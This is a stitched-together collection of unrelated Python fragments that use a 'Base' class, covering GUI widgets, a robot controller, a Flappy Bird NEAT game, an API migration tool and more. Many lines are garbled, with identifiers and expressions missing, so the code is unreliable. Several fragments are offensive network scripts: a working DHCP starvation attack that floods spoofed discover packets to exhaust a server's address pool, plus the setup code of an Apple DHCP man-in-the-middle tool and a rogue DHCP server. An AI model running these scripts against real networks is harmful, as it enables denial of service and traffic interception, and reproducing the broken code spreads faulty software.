def __init__(self, user_id): Base.__init__(self, __name__) self.user_id = user_id self.config = ConfigParser.ConfigParser()'config.ini') self.all_achievements = MootDao().get_achievements(self.user_id) self.all_products = MootDao().get_products(self.user_id)
def __init__(self, seqTab, sequence, position, minusPrimer, plusPrimer, parent = None): super(Sequence, self).__init__() self.seqTab = seqTab self.baseClassL = self.seqTab.baseClassL self.sortBaseL = self.seqTab.sortBaseL print 'Id from Sequence item: ' + str(id(self.baseClassL)) self.fill = QColor(100, 204, 150) self.seq = sequence self.rect = QRectF(0, 0, 12*len(self.seq), 30) # self.setFlags(QGraphicsItem.ItemIsMovable) self.minusPrimer = minusPrimer self.plusPrimer = plusPrimer count = 0 for nucleotide in self.seq: if count >= (len(self.seq))/2: primer = self.minusPrimer else: primer = self.plusPrimer base = Base(nucleotide, primer) base.setParentItem(self) base.setPos(count*12, 0) count = count + 1 self.setPos(position[0], position[1])
def __init__(self,_folder): self._folder = _folder base = Base(self._folder) if base.checker() == True: self.createDb() else: self.accessDb()
def __init__(self, addr, port, network=None): Base.__init__(self, DFS(addr, port)) self.fileSystem_ = FileSystem(self.dfs_) if not network: network = Network(self.dfs_, self.fileSystem_) self.network_ = network
def __init__(self, pcapObj): """pcap = pcap file name""" Base.__init__(self) = 0 self.p = pcapObj format = "%(filter)-40s %(total)10d\n" self.msg = stringFormatMessage(format=format)
def tearDown(self): Base.tearDown(self) shutil.rmtree(self.dir1) shutil.rmtree(self.dir2) config.shutdown()
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) # Create x, y, z and camera normal axes self.axes.append( self.CreateArrow( Vec3(1, 0, 0), RED ) ) self.axes.append( self.CreateArrow( Vec3(0, 1, 0), GREEN ) ) self.axes.append( self.CreateArrow( Vec3(0, 0, 1), BLUE ) ) self.axes.append( self.CreateSquare( Vec3(0, 0, 0), TEAL ) )
def __init__(self, w): Base.__init__(self) self.__fname = None self.__pixman = PixMan(w) self.__currentLine = 0 #cache the breakpoints in this code view: self.__breakpoints = { } self.__model = gtk.ListStore( gobject.TYPE_OBJECT, gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING, ) self.__init_pixbufs(w) self.__scrolled = gtk.ScrolledWindow() self.__scrolled.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) self.__w = gtk.TreeView(self.__model) self.__thread = None self.__addr = 0 self.__scrolled.add(self.__w) tree = self.__w tree.connect("button_press_event", self.__on_button_press) tree.set_headers_visible(False) tree.get_selection().set_mode(gtk.SELECTION_SINGLE) # for the arrow at the current program counter: renderer = gtk.CellRendererPixbuf() tree.append_column(gtk.TreeViewColumn("", renderer, pixbuf=0)) renderer = gtk.CellRendererText() tree.append_column(gtk.TreeViewColumn("", renderer, text=1)) tree.append_column(gtk.TreeViewColumn("", renderer, text=2)) tree.append_column(gtk.TreeViewColumn("", renderer, text=3))
def __init__(self,x,y,effect,interactions=False,effectTransforms=True,interactionTransforms=True,helmertConvert=False,*args,**kwargs): self.effect = effect self.k = self.effect.shape[1] # number of effects = [np.unique(self.effect[:,i]).shape[0] for i in range(self.k)] # number of levels for each effect self.effectTransforms = effectTransforms self.interactionTransforms = interactionTransforms if type(interactions) == bool: self.interactions = interactions self._interactions = {} for i in range(self.k): for j in range(i+1,self.k): self._interactions[(i,j)] = True elif type(interactions) == list: self.interactions = True self._interactions = {} for i,j in interactions: if j < i: i,j = j,i self._interactions[(i,j)] = True self.helmertConvert = helmertConvert self.contrasts = [self.buildEffectContrastMatrix(i) for i in range(self.k)] self.contrasts_interaction = {} self.projectionMatrices = {i:self._projectionMatrix(i) for i in range(self.k)} for i in range(self.k): for j in range(i): if self.interactions: self.contrasts_interaction[(j,i)] = np.kron(self.contrasts[j],self.contrasts[i]) self.projectionMatrices[(j,i)] = self._projectionMatrix(j,i) self._effectInteractionIndex = {} # starting index for each interaction in function matrix Base.__init__(self,x,y,*args,**kwargs)
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) self.AddAttributes( Attr( 'Name', str, TS.getName, TS.setName ), parent='TextureStage' )
def test_base_fields(self): id = 3; name = "test" from base import Base base = Base(id, name) self.assertEqual(id, self.assertEqual(name,
def __init__( self, label, type_, getFn, setFn, clearFn, srcComp=None, args=[] ): Base.__init__( self, label, type_, getFn, setFn, srcComp=srcComp ) self.clearFn = clearFn self.args = args self.cnnctn = True
def __init__(self, env = '', dir='', modules={}, vm=None, **kwargs): self.modules = modules self.vm = vm = env self.env = env self.is_vm = False Base.__init__(self, vm, **kwargs)
def __init__(self, *args, **kwargs): Base.__init__(self, *args, **kwargs) self.drawer = DrawerSDL() = Camera() self.objects = [] # Things in the system (eg, planets, stations)
def xiin(self, xiinArgs): """ The actual xiin workhorse. See for more information. """ from base import Base xiinAction = Base() xiinAction.xiin(xiinArgs)
def __init__(self, tree): Base.__init__(self) self.__model = gtk.ListStore( gobject.TYPE_PYOBJECT, gobject.TYPE_STRING, gobject.TYPE_STRING, ) model_sort = gtk.TreeModelSort(self.__model) #start in a sorted state model_sort.set_sort_column_id(1, gtk.SORT_ASCENDING) if tree: renderer = gtk.CellRendererText() tree.set_model(model_sort) tree.append_column(gtk.TreeViewColumn("Name", renderer, text=1)) tree.append_column(gtk.TreeViewColumn("Value", renderer, text=2)) tree.get_column(0).set_resizable(True) tree.get_column(0).set_clickable(True) tree.get_column(1).set_clickable(True) tree.get_column(0).set_sort_column_id(1) tree.get_column(1).set_sort_column_id(2) #start in a sorted state tree.get_column(0).set_sort_order(gtk.SORT_ASCENDING) tree.get_column(0).set_sort_indicator(True)
def __init__(self, directory='', modules={}, vm=None, **kwargs): self.modules = modules self.vm = vm = directory +'@name' = directory self.is_vm = False Base.__init__(self, vm, **kwargs)
def main(argv): parser = argparse.ArgumentParser() parser.add_argument("apikey", type=str, help="Mashery V2 API Key") parser.add_argument("secret", type=str, help="Mashery V2 API Secret") parser.add_argument("siteId", type=str, help="Mashery Area/Site ID") parser.add_argument("outputFile", type=str, help="Output Filename") args = parser.parse_args() apikey = args.apikey secret = args.secret siteId = args.siteId outputFile = args.outputFile masheryV2 = Base('https', '', siteId, apikey, secret) allDevelopers = masheryV2.fetch('members', 'username, email, applications, keys, package_keys', '') f = open(outputFile,'w') headers = 'username, email, num_applications, num_keys, num_package_keys\n' f.write(headers) for developer in allDevelopers: fieldValues = '' fieldValues = fieldValues + '"' + developer['username'] + '",' fieldValues = fieldValues + '"' + developer['email'] + '",' fieldValues = fieldValues + str(len(developer['applications'])) + ',' fieldValues = fieldValues + str(len(developer['keys'])) + ',' fieldValues = fieldValues + str(len(developer['package_keys'])) f.write(fieldValues + '\n')
def __init__(self, nodes_ok, nodes_fail, proxies_ok, proxies_fail): Base.__init__(self, stat_json=json.dumps({ 'nodes_ok': nodes_ok, 'nodes_fail': nodes_fail, 'proxies_ok': proxies_ok, 'proxies_fail': proxies_fail, }))
def __init__(self, pcapObj): Base.__init__(self) self.exp = None self.p = pcapObj self.action = None self.doWordSearch = 0 format = "%(pattern)-10s %(proto)-5s %(source)-15s %(sport)-15s %(dest)-15s %(dport)-5s %(count)10s\n" self.msg = stringFormatMessage(format=format)
def __init__(self): Base.__init__(self,name=None,size=None,pos=None,stat=None,col=None,img=None) self.velocity = 20 self.hasReachedDestination = True self.endPosition = None self.path = [] self.counter = 0 self.listOfTreasures = []
def __init__(self, *args, **kwargs): Base.__init__(self, *args, **kwargs) self.AddAttributes( Attr("Origin", pm.Point3, CR.getOrigin, CR.setOrigin), Attr("Direction", pm.Vec3, CR.getDirection, CR.setDirection), parent="CollisionRay", )
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) self.AddAttributes( Attr( 'Normal', pm.Vec3, initDefault=pm.Vec3( 0, 0, 1 ) ), Attr( 'Constant', int, initDefault=0 ), parent='BulletBoxShape' )
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) self.AddAttributes( Attr( 'Half Extents', pm.Vec3, BBS.getHalfExtentsWithMargin, initDefault=pm.Vec3( 0.5, 0.5, 0.5 ) ), parent='BulletBoxShape' )
def __init__(self, *args, **kwargs): Base.__init__(self, *args, **kwargs) self.AddAttributes( Attr("Center", pm.Point3, CS.getCenter, CS.setCenter), Attr("Radius", float, CS.getRadius, CS.setRadius), parent="CollisionSphere", )
def __init__(self): Base.__init__(self) self.image = None # Variables for tiled to work with. self.xCameraMultiplier = 1 # tells the camera which direction is positive on the x axis self.yCameraMultiplier = 1 # and also for the y axis
def __init__(self,entries=None): if entries: Base.__init__(self, entries) return self.version = '1.0' self.session_id = '' self.values = '{}' self.created =
def __init__(self, entries=None): if entries: Base.__init__(self, entries) return self.version = "1.0" self.api_id = "" self.api_data = {} = False
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) self.AddAttributes( Cnnctn( 'PhysicsWorld', BW, base.scene.GetPhysicsWorld, base.scene.SetPhysicsWorld, base.scene.ClearPhysicsWorld ), parent='Scene' )
def __init__( self, *args, **kwargs ): Base.__init__( self, *args, **kwargs ) self.AddAttributes( Attr( 'Name', str, T.getName, T.setName ), Attr( 'Full Path', Filename, T.getFullpath, self.SetTex ), parent='Texture' )
class Robot_Interface(object): """For usage with the Fetch robot.""" def __init__(self, simulation=True): """Initializes various aspects of the Fetch. TODOs: get things working, also use `simulation` flag to change ROS topic names if necessary (especially for the cameras!). UPDATE: actually I don't think this is necessary now, they have the same topic names. """ rospy.init_node("fetch") self.arm = Arm() self.arm_joints = ArmJoints() self.base = Base() = RGBD() self.head = Head() self.gripper = Gripper( self.torso = Torso() self.joint_reader = JointStateReader() # Tucked arm starting joint angle configuration self.names = ArmJoints().names() self.tucked = [1.3200, 1.3999, -0.1998, 1.7199, 0.0, 1.6600, 0.0] self.tucked_list = [(x,y) for (x,y) in zip(self.names, self.tucked)] # Initial (x,y,yaw) position of the robot wrt map origin. We keep this # fixed so that we can reset to this position as needed. The HSR's # `omni_base.pose` (i.e., the start pose) returns (x,y,yaw) where yaw is # the rotation about that axis (intuitively, the z axis). For the base, # `base.odom` supplies both `position` and `orientation` attributes. start = copy.deepcopy(self.base.odom.position) yaw = Base._yaw_from_quaternion(self.base.odom.orientation) self.start_pose = np.array([start.x, start.y, yaw]) self.TURN_SPEED = 0.3 self.num_restarts = 0 def body_start_pose(self, start_height=0.10, end_height=0.10, velocity_factor=None): """Sets the robot's body to some initial configuration. The HSR uses `whole_body.move_to_go()` which initializes an appropriate posture so that the hand doesn't collide with movement. For the Fetch, we should probably make the torso extend, so the arms can extend more easily without collisions. Use `move_to_joint_goal` since that uses motion planning. Do NOT directly set the joints without planning!! """ self.torso.set_height(start_height) self.arm.move_to_joint_goal(self.tucked_list, velocity_factor=velocity_factor) self.torso.set_height(end_height) # Specific to the siemens challenge (actually a lot of this stuff is ...) if self.num_restarts == 0: self.base.turn(angular_distance=45*DEG_TO_RAD) self.num_restarts += 1 def head_start_pose(self): """Hard-coded starting pose for the robot's head. These values are from the HSR. The Fetch needs a different pan and tilt. Positive pan means rotating counterclockwise when looking at robot from an aerial view. """ self.head.pan_tilt(pan=0.0, tilt=0.8) def position_start_pose(self, offsets=None, do_something=False): """Assigns the robot's base to some starting pose. Mainly to "reset" the robot to the original starting position (and also, rotation about base axis) after it has moved, usually w/no offsets. Ugly workaround: we have target (x,y), and compute the distance to the point and the angle. We turn the Fetch according to that angle, and go forward. Finally, we do a second turn which corresponds to the target yaw at the end. This turns w.r.t. the current angle, so we undo the effect of the first turn. See `examples/` for tests. Args: offsets: a list of length 3, indicating offsets in the x, y, and yaws, respectively, to be added onto the starting pose. """ # Causing problems during my tests of the Siemens demo. if not do_something: return current_pos = copy.deepcopy(self.base.odom.position) current_theta = Base._yaw_from_quaternion(self.base.odom.orientation) # [-pi, pi] ss = np.array([current_pos.x, current_pos.y, current_theta]) # Absolute target position and orientation specified with `pp`. pp = np.copy(self.start_pose) if offsets: pp += np.array(offsets) # Get distance to travel, critically assumes `pp` is starting position. dist = np.sqrt( (ss[0]-pp[0])**2 + (ss[1]-pp[1])**2 ) rel_x = ss[0] - pp[0] rel_y = ss[1] - pp[1] assert -1 <= rel_x / dist <= 1 assert -1 <= rel_y / dist <= 1 # But we also need to be *facing* the correct direction, w/input [-1,1]. # First, get the opposite view (facing "outwards"), then flip by 180. desired_facing = np.arctan2(rel_y, rel_x) # [-pi, pi], facing outward desired_theta = math.pi + desired_facing # [0, 2*pi], flip by 180 if desired_theta > math.pi: desired_theta -= 2*math.pi # [-pi, pi] # Reconcile with the current theta. Got this by basically trial/error angle = desired_theta - current_theta # [-2*pi, 2*pi] if angle > math.pi: angle -= 2*math.pi elif angle < -math.pi: angle += 2*math.pi self.base.turn(angular_distance=angle, speed=self.TURN_SPEED) self.base.go_forward(distance=dist, speed=0.2) # Back at the start x, y, but now need to consider the _second_ turn. # The robot is facing at `desired_theta` rads, but wants `pp[2]` rads. final_angle = pp[2] - desired_theta if final_angle > math.pi: final_angle -= 2*math.pi elif final_angle < -math.pi: final_angle += 2*math.pi self.base.turn(angular_distance=final_angle, speed=self.TURN_SPEED) def get_img_data(self): """Obtain camera and depth image. Returns: Tuple containing RGB camera image and corresponding depth image. """ c_img = d_img = return (c_img, d_img) def get_depth(self, point, d_img): """Compute mean depth near grasp point. NOTE: assumes that we have a simlar `cfg.ZRANGE` as with the HSR. I'm not sure where exactly this comes from. """ y, x = int(point[0]), int(point[1]) z_box = d_img[y-ZRANGE:y+ZRANGE, x-ZRANGE:x+ZRANGE] indx = np.nonzero(z_box) z = np.mean(z_box[indx]) return z def get_rot(self, direction): """Compute rotation of gripper such that given vector is grasped. Currently this directly follows the HSR code as there's nothing Fetch-dependent. """ dy, dx = direction[0], direction[1] dx *= -1 if dy < 0: dx *= -1 dy *= -1 rot = np.arctan2(dy, dx) rot = np.pi - rot return rot def create_grasp_pose(self, x, y, z, rot): """ If `intuitive=True` then x,y,z,rot interpreted wrt some link in the world, e.g., 'odom' for the Fetch. It's False by default to maintain backwards compatibility w/Siemens-based code. """ pose_name = self.gripper.create_grasp_pose(x, y, z, rot) return pose_name def open_gripper(self): def close_gripper(self): self.gripper.close() def move_to_pose(self, pose_name, z_offset, velocity_factor=None): """Moves to a pose. In the HSR, moved the `hand_palm_link` to the frame named `pose_name` at the correct pose. For the Fetch we should be able to extract the pose from `pose_name` and then call the Arm's `move_to_pose` method. Args: pose_name: A string name for the pose to go z_offset: Scalar offset in z-direction, offset is wrt the pose specified by `pose_name`. velocity_factor: controls the speed, closer to 0 means slower, closer to 1 means faster. (If 0.0, then it turns into 1.0 for some reason.) Values greater than 1.0 are cut to 1.0. """ # See: # # # First frame should be the reference frame, use `base_link`, not `odom`. point, quat ='base_link', pose_name, rospy.Time(0)) z_point = point[2] + z_offset # See: # # ps = PoseStamped() ps.header.frame_id = 'base_link' ps.pose = Pose( Point(point[0], point[1], z_point), Quaternion(quat[0], quat[1], quat[2], quat[3]) ) # See `` written by Justin Huang error = self.arm.move_to_pose(pose_stamped=ps, velocity_factor=velocity_factor) if error is not None: rospy.logerr(error) def find_ar(self, ar_number, velocity_factor=None): try: ar_name = 'ar_marker/' + str(ar_number) # HSR code, with two hard-coded offsets? #self.whole_body.move_end_effector_pose(geometry.pose(y=0.08, z=-0.3), ar_name) # Fetch 'translation'. Note the `ar_name` for pose name. point, quat ='base_link', ar_name, rospy.Time(0)) y_point = point[1] + 0.08 z_point = point[2] - 0.3 ps = PoseStamped() ps.header.frame_id = 'base_link' ps.pose = Pose( Point(point[0], y_point, z_point), Quaternion(quat[0], quat[1], quat[2], quat[3]) ) error = self.arm.move_to_pose(pose_stamped=ps, velocity_factor=velocity_factor) if error is not None: rospy.logerr(error) return True except: return False def pan_head(self, tilt): """Adjusts tilt of the robot, AND set pan at zero. Args: tilt: Value in radians, positive means looking downwards. """ self.head.pan_tilt(pan=0, tilt=tilt)
class FlappyBird: """ Flappy bird game """ BG_IMG = pygame.transform.scale2x( pygame.image.load(os.path.join("img", "bg.png"))) SCORE_FONT = pygame.font.SysFont("comicsans", 50) CONFIG_PATH = os.path.join(os.path.dirname(__file__), "config-feedforward.txt") def __init__(self, win_width=500, win_height=800): self.win_width = win_width self.win_height = win_height self.size = (win_width, win_height) self.gen = 0 self.neat_init() def neat_init(self): """ Initialize neat algorithm """ self.config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, self.CONFIG_PATH) self.population = neat.Population(self.config) self.population.add_reporter(neat.StdOutReporter(True)) stats = neat.StatisticsReporter() self.population.add_reporter(stats) def on_init(self, genomes, config): """ Initialize before the main loop """ pygame.init() = pygame.display.set_mode(self.size) pygame.display.set_caption("Flappy bird") self.clock = pygame.time.Clock() self.score = 0 self.gen += 1 self.nets = [] = [] self.birds = [] for _, genome in genomes: = 0 net = neat.nn.FeedForwardNetwork.create(genome, config) self.nets.append(net) self.birds.append(Bird(230, 350)) self.base = Base(self.win_height) self.pipes = [Pipe(self.win_width + 200)] = True def on_event(self, event): """ Check for events """ if event.type == pygame.QUIT: = False pygame.quit() quit() def on_loop(self): """ Compute changes in the game """ self.clock.tick(30) self.base.move() self.pipe_movement() if not self.birds: = False def pipe_movement(self): """ Move pipes and check for collision with bird """ pipe_idx = 0 if self.birds[ 0].x > self.pipes[0].x + self.pipes[0].PIPE_TOP.get_width(): pipe_idx = 1 for idx, bird in enumerate(self.birds): bird.move()[idx].fitness += 0.1 output = self.nets[idx].activate( (bird.y, abs(bird.y - self.pipes[pipe_idx].height), abs(bird.y - self.pipes[pipe_idx].bot))) if output[0] > 0.5: bird.jump() if bird.y + bird.img.get_height( ) >= self.win_height - 70 or bird.y < 0: self.birds.pop(idx) self.nets.pop(idx) for pipe in self.pipes: pipe.move() for idx, bird in enumerate(self.birds): if pipe.collide(bird):[idx].fitness -= 1 self.birds.pop(idx) self.nets.pop(idx) if not pipe.passed and pipe.x < bird.x: pipe.passed = True self.score += 1 for genome in += 5 self.pipes.append(Pipe(600)) if pipe.x + pipe.PIPE_TOP.get_width() < 0: self.pipes.remove(pipe) def on_render(self): """ Render all graphics """, (0, 0)) self.base.draw( for bird in self.birds: bird.draw( for pipe in self.pipes: pipe.draw( # Show score text = self.SCORE_FONT.render("Score: " + str(self.score), 1, (255, 255, 255)), (self.win_width - 10 - text.get_width(), 10)) # Show generation text = self.SCORE_FONT.render("Gen: " + str(self.gen), 1, (255, 255, 255)), (10, 10)) pygame.display.update() def main(self, genomes, config): """ Creates the main loop """ self.on_init(genomes, config) while for event in pygame.event.get(): self.on_event(event) self.on_loop() self.on_render() def run_neat(self): """ Run neat(NeuroEvolution of Augmenting Topologies) algorithm """, 50)
def startt(self, fn, rating, part, part2, material, size, a105, f22, f91, f92, wcb, wcc, wc9, c12a, c12ab): Base(fn, rating, part, part2, material, size, self.evp.get(), self.evs.get(), a105, f22, f91, f92, wcb, wcc, wc9, c12a, c12ab)
import engine from base import Base, Filter from datetime import datetime, time, date ######################################################################################################################## print('Welcome to database!' + '\n' + 'Which data you like to add:' + '\n' + '1. Add human' + '\n' + '2. Add crime' + '\n' + '3. Watch humans' + '\n' + '4. Watch crimes' + '\n' + '5. Find human by name' + '\n' + '6. Get crimes by date' + '\n' + '7. Get humans by period') base = Base() while True: choice = input('Write number: ') ############################################ if choice == '1': f_name = input('Enter first name: ') l_name = input('Enter last name: ') b_date = input('Enter birth date: ') engine.add_human(f_name, l_name, b_date, base) ############################################ elif choice == '2': date = input('Enter date: ')
from selenium import webdriver from time import sleep from base import Base, browser driver = browser() driver.get('') zentao = Base(driver) loc_submit = ('id', 'submit') r1 = zentao.is_alert() print(r1) r2 = zentao.is_alert() print(r2) print(r2.text) r2.accept() sleep(2) driver.quit()
def setUp(self): self.connection = Connection(":memory:") self.engine = Generic(self.connection, self.dir_path, True, True) Base.setUp(self)
from network import Ethernet_raw, DHCP_raw, Sniff_raw from tm import ThreadManager from base import Base from socket import socket, SOCK_RAW, AF_PACKET from sys import exit from os import system from argparse import ArgumentParser from datetime import datetime from time import sleep, time from random import randint from json import dumps # endregion # region Check user, platform and print banner Base = Base() Base.check_user() Base.check_platform() Base.print_banner() # endregion # region Parse script arguments parser = ArgumentParser(description='DHCP Starvation attack script') parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets') parser.add_argument('-d', '--delay', type=int, help='Set delay time in seconds (default: 1)',
def send_dhcp_discover(): sleep(1) eth = Ethernet_raw() dhcp = DHCP_raw() Base.print_info("Sending discover packets...") Base.print_info("Delay between DISCOVER packets: ", str(args.delay), " sec.") Base.print_info("Start sending packets: ", str("%Y/%m/%d %H:%M:%S"))) discover_raw_socket = socket(AF_PACKET, SOCK_RAW) discover_raw_socket.bind((listen_network_interface, 0)) try: while True: client_mac = eth.get_random_mac() transaction_id = randint(1, 4294967295) discover_packet = dhcp.make_request_packet( source_mac=your_mac_address, client_mac=client_mac, transaction_id=transaction_id, dhcp_message_type=1, host_name=None, requested_ip=None, option_value=dhcp_option_value, option_code=dhcp_option_code, relay_agent_ip=your_ip_address) discover_raw_socket.send(discover_packet) transactions[transaction_id] = client_mac if int(time() - start_time) > args.timeout: if ack_received: Base.print_success( "IP address pool is exhausted: ", str("%Y/%m/%d %H:%M:%S"))) else: Base.print_error("DHCP Starvation failed timeout!") sleep(1) exit(1) sleep(int(args.delay)) except KeyboardInterrupt: Base.print_info("Exit") discover_raw_socket.close() exit(0)
def send_dhcp_request(request): # region Global variables global start_time global ack_received global transactions global dhcp_server_ip global dhcp_server_mac global global_socket # endregion if 'DHCP' in request.keys(): # region Get reply transaction id, client ip xid = request['BOOTP']['transaction-id'] yiaddr = request['BOOTP']['your-ip-address'] siaddr = request['BOOTP']['server-ip-address'] # endregion # region Get DHCP server IP if dhcp_server_ip is None: if siaddr == "": dhcp_server_ip = request['IP']['source-ip'] else: dhcp_server_ip = siaddr dhcp_server_mac = request['Ethernet']['source'] # endregion # region Rewrite start time start_time = time() # endregion # region DHCP OFFER if request['DHCP'][53] == 2: if args.find_dhcp: Base.print_success("DHCP server IP: ", dhcp_server_ip) Base.print_success("DHCP server MAC: ", dhcp_server_mac) Base.print_success("DHCP packet: ") print(dumps(request, indent=4)) exit(0) Base.print_info("OFFER from: ", dhcp_server_ip, " your client ip: ", yiaddr) try: if args.not_send_hostname: host_name = None else: host_name = Base.make_random_string(8) dhcp = DHCP_raw() request_packet = dhcp.make_request_packet( source_mac=your_mac_address, client_mac=transactions[xid], transaction_id=xid, dhcp_message_type=3, host_name=host_name, requested_ip=yiaddr, option_value=dhcp_option_value, option_code=dhcp_option_code, relay_agent_ip=your_ip_address) global_socket.send(request_packet) except KeyError: Base.print_error("Key error, this transaction id: ", hex(xid), " not found in our transactions!") except: Base.print_error("Unknown error!") # endregion # region DHCP ACK if request['DHCP'][53] == 5: ack_received = True Base.print_info("ACK from: ", dhcp_server_ip, " your client ip: ", yiaddr) # endregion # region DHCP NAK if request['DHCP'][53] == 6: Base.print_error("NAK from: ", dhcp_server_ip, " your client ip: ", yiaddr)
from arp_scan import ArpScan from os import path, errno, makedirs, stat from shutil import copyfile, copytree import subprocess as sub from argparse import ArgumentParser from sys import exit, stdout from time import sleep from ipaddress import IPv4Address from socket import socket, AF_PACKET, SOCK_RAW from random import randint import re # endregion # region Check user, platform and print banner Base = Base() Scanner = Scanner() ArpScan = ArpScan() Base.check_user() Base.check_platform() Base.print_banner() # endregion # region Parse script arguments parser = ArgumentParser(description='Apple DHCP MiTM script') parser.add_argument('-l', '--listen_iface', type=str, help='Set interface name for send DHCPACK packets') parser.add_argument('-d', '--deauth_iface',
#!/usr/bin/env python from base import Base from network import Ethernet_raw, ARP_raw, DHCP_raw from sys import exit from argparse import ArgumentParser from ipaddress import IPv4Address from scapy.all import Ether, ARP, BOOTP, DHCP, sniff, sendp from socket import socket, AF_PACKET, SOCK_RAW, inet_aton from base64 import b64encode from struct import pack from netaddr import IPAddress from tm import ThreadManager from time import sleep Base = Base() Base.check_user() Base.check_platform() tm = ThreadManager(3) parser = ArgumentParser(description='DHCP Rogue server') parser.add_argument('-i', '--interface', help='Set interface name for send reply packets') parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default='') parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default='') parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None) parser.add_argument('-I', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None) parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output') parser.add_argument('--apple', action='store_true', help='Apple devices MiTM') parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
class BaseMigrator: def __init__(self, ): self.migration_environment = MigrationEnvironment() mashery_api_config = self.migration_environment.configuration # Logging: had to move to this class since i don't understand python enough; # for some reason i couldn't get python to emit the logs to different files; # should be re-factored at some point # turn off info from http requests library logging.getLogger('requests').setLevel(logging.ERROR) # set a format which is simpler for console use formatter1 = logging.Formatter( '%(name)-12s: %(levelname)-8s %(message)s') # define a Handler which writes INFO messages or higher to the sys.stderr streamHandler = logging.StreamHandler() streamHandler.setLevel(logging.ERROR) streamHandler.setFormatter(formatter1) logging.getLogger('').addHandler(streamHandler) formatter2 = logging.Formatter( '%(asctime)s %(name)-12s %(levelname)-8s %(message)s') l1 = logging.getLogger(self.__class__.__name__) fileHandler1 = logging.FileHandler( mashery_api_config['migration']['log_location'] + 'package_migrator.log', mode='a') fileHandler1.setLevel(logging.INFO) fileHandler1.setFormatter(formatter2) l1.addHandler(fileHandler1) l1.setLevel(logging.INFO) l1 = logging.getLogger(self.__class__.__name__) l2 = logging.getLogger(self.__class__.__name__ + 'Transactions') fileHandler2 = logging.FileHandler( mashery_api_config['migration']['log_location'] + 'package_migrator_transactions.log', mode='a') fileHandler2.setLevel(logging.INFO) fileHandler2.setFormatter(formatter2) l2.addHandler(fileHandler2) l2.setLevel(logging.INFO) l2 = logging.getLogger(self.__class__.__name__ + 'Transactions') self.base = Base(mashery_api_config['mashery_api']['protocol'], mashery_api_config['mashery_api']['hostname'], mashery_api_config['mashery_area']['id'], mashery_api_config['mashery_api']['apikey'], mashery_api_config['mashery_api']['secret'], l2) self.validator = Validator(l1) self.logger = l1 def update_object_with_required_attributes(self, object_to_update, missing_properties): for missing_property in missing_properties: if missing_property['field'] == 'uri': object_to_update[ missing_property['field']] = '' else: object_to_update[missing_property['field']] = 'default' return object_to_update def confirm_ready(self): print '================================================' print 'Area ID= ' + str( self.migration_environment.configuration['mashery_area']['id']) print 'Area Name= ' + self.migration_environment.configuration[ 'mashery_area']['name'] print 'API Hostname/Environment= ' + self.migration_environment.configuration[ 'mashery_api']['hostname'] print ' ' print 'Backup Location= ' + self.migration_environment.configuration[ 'migration']['backup_location'] print 'Log Location= ' + self.migration_environment.configuration[ 'migration']['log_location'] print 'Key Input File= ' + self.migration_environment.configuration[ 'migration']['key_input_file'] print ' ' print '================================================' proceed = raw_input('Proceed? (y/n)') if proceed == 'y': return True return False def ready_for_migration(self): # fetch area config try: area = self.base.area_fetch() except ValueError as err: self.logger.error('Error fetching data: %s', json.dumps(err.args)) return # fetch keys in area, to see if there are any existing # memberless or applicationless ones try: keys = self.base.fetch( 'keys', '*, member, application, service, developer_class', '') except ValueError as err: self.logger.error('Error fetching data: %s', json.dumps(err.args)) return applications = self.transform_keys_map_to_applications_map(keys) area_validation_data = self.validator.validate_area_for_migration( area, applications, keys)'ready_for_migration: %s', json.dumps(area_validation_data)) return area_validation_data['ready_for_migration'] def transform_keys_map_to_applications_map(self, keys): applications = {} for key in keys: app_id = 0 if (key['application'] != None): app_id = key['application']['id'] application = {} application['keys'] = [] if app_id in applications: application = applications[app_id] application['keys'].append(key) applications[app_id] = application return applications def get_migration_data(self, migration_file): try: f = open(migration_file, 'r') file_contents = migration_data = json.loads(file_contents) f.close() return migration_data except IOError: self.logger.error('Failed opening migration map file.') return None except ValueError: self.logger.error('Invalid JSON in migration map file.') return None def application_should_be_consolidated(self, application): key_set = [] package_set = [] plan_set = [] for key in application['keys']: if (key['apikey'] not in key_set): key_set.append(key['apikey']) if (len(key_set) == 1 and len(application['keys']) > 1):'Application %s has keys of same value', str(application['id'])) return True return False def restore_application(self, application, nodryrun): if (application['id'] != ''): application_data = self.base.fetch( 'applications', '*, package_keys', 'WHERE id = ' + str(application['id'])) if (len(application_data) == 1): application_data = application_data[0] else: self.logger.error('Problem fetching application for %s', json.dumps(application)) return False package_keys_to_delete = [] keys_to_restore = [] package_key_data = None for key in application['keys']: if ('package_id' not in key or 'plan_id' not in key): self.logger.warn( 'Application %s has keys without package plan', str(application_data['id'])) continue # fetch key data package_keys = self.base.fetch( 'package_keys', '*, member, application, package, plan', 'WHERE apikey = \'' + key['apikey'] + '\'') for data in package_keys: if (data['package']['id'] == key['package_id'] and data['plan']['id'] == key['plan_id']): package_key_data = data break if (package_key_data != None): package_keys_to_delete.append(package_key_data) key_data = self.get_service_key_from_backup( self.migration_environment.configuration['migration'] ['backup_location'], key) if (key_data == None): key_data = self.fetch_key(key) if key_data == None: self.logger.error('Problem fetching service key for %s', json.dumps(application)) return False keys_to_restore.append(key_data) # before enabling app for packager we must delete and archive all keys if (nodryrun == True): try: t_del = [] for k in package_keys_to_delete: t_del.append(k['id']) if (len(t_del) > 0): self.base.delete('package_key', t_del) except ValueError as err: self.logger.error('Problem deleting package keys: %s', json.dumps(err.args)) return False application_data['is_packaged'] = False try: self.base.update('application', application_data) except ValueError as err: if (err.args[0][0]['message'] == 'Invalid Object'): application_data = self.update_object_with_required_attributes( application_data, err.args[0][0]['data']) try: application = self.base.update('application', application_data) except ValueError as err: self.logger.error(json.dumps(err.args)) return False else: 